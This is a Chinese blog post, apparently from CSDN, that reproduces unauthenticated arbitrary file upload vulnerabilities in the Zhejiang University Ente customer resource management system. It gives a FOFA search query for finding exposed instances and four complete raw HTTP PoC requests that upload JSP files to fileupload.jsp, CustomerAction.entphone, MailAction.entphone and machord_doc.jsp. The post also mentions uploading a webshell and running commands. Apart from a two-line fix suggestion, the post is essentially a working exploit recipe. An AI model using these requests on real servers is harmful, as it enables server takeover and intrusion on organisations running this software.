• 浙大恩特客户资源管理系统任意文件上传漏洞复现


    0x01 产品简介

         浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

    0x02 漏洞概述

      浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。

    0x03 复现环境

    FOFA:app="浙大恩特客户资源管理系统"

    0x04 漏洞复现 

    PoC-1

    1. POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=1.jsp HTTP/1.1
    2. Host: your-ip
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    4. Content-Type: application/x-www-form-urlencoded
    5. Connection: close
    6. Accept-Encoding: gzip, deflate
    7. 123

    回显了上传路径 

    验证

    PoC-2

    1. POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
    2. Host: your-ip
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    6. Accept-Encoding: gzip, deflate
    7. Connection: close
    8. Upgrade-Insecure-Requests: 1
    9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
    10. ------WebKitFormBoundarye8FPHsIAq9JN8j2A
    11. Content-Disposition: form-data; name="file";filename="2.jsp"
    12. Content-Type: image/jpeg
    13. <%out.print("test");%>
    14. ------WebKitFormBoundarye8FPHsIAq9JN8j2A--

    回显了上传路径 

    验证

     PoC-3

    1. POST /entsoft/MailAction.entphone;.js?act=saveAttaFile HTTP/1.1
    2. Host: your-ip
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9
    5. Accept-Encoding: gzip, deflate
    6. Accept-Language: zh-CN,zh;q=0.9
    7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
    8. ------WebKitFormBoundarye8FPHsIAq9JN8j2A
    9. Content-Disposition: form-data; name="file";filename="3.jsp"
    10. Content-Type: image/jpeg
    11. <%out.print("test");%>
    12. ------WebKitFormBoundarye8FPHsIAq9JN8j2A--

    回显了上传路径 

    验证

    PoC-4 

    1. POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=4.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1
    2. Host: your-ip
    3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQzxXQpKIb1f32N11
    4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
    5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    6. Accept-Encoding: gzip, deflate
    7. Accept-Language: zh-CN,zh;q=0.9
    8. Connection: close
    9. ------WebKitFormBoundaryQzxXQpKIb1f32N11
    10. Content-Disposition: form-data; name="oprfilenam"
    11. null
    12. ------WebKitFormBoundaryQzxXQpKIb1f32N11
    13. Content-Disposition: form-data; name="uploadflg"
    14. 0
    15. ------WebKitFormBoundaryQzxXQpKIb1f32N11
    16. Content-Disposition: form-data; name="strAffixStr"
    17. ------WebKitFormBoundaryQzxXQpKIb1f32N11
    18. Content-Disposition: form-data; name="selfilenam"
    19. ------WebKitFormBoundaryQzxXQpKIb1f32N11
    20. Content-Disposition: form-data; name="uploadfile"; filename="4.jsp"
    21. Content-Type: image/png
    22. <%out.print("test-PoC-4");%>
    23. ------WebKitFormBoundaryQzxXQpKIb1f32N11--

     上传后响应体查找上传的的文件名,会发现上传路径

    尝试验证

    漏洞利用(上传马子)

    命令执行 

     0x05 修复建议 

    关闭互联网暴露面或设置接口访问权限

     升级至安全版本

  • 相关阅读:
    从【臀部监控】到【电脑监控软件】,企业如何在隐私权与管理权博弈中找到平衡
    Git详细介绍 -入门到实战万字篇(上)
    C#编程学习与实践
    让人疑惑的STM32F4F7芯片
    Java:什么是Java框架?
    Github 2024-03-08 Java开源项目日报 Top10
    【03】FISCOBCOS配置及使用控制台
    腰部外骨骼机器人线性自抗扰控制器参数优化
    LeetCode: 2. 两数相加
    万字总结数据库Redis,值得大家收藏
  • 原文地址:https://blog.csdn.net/qq_41904294/article/details/134340030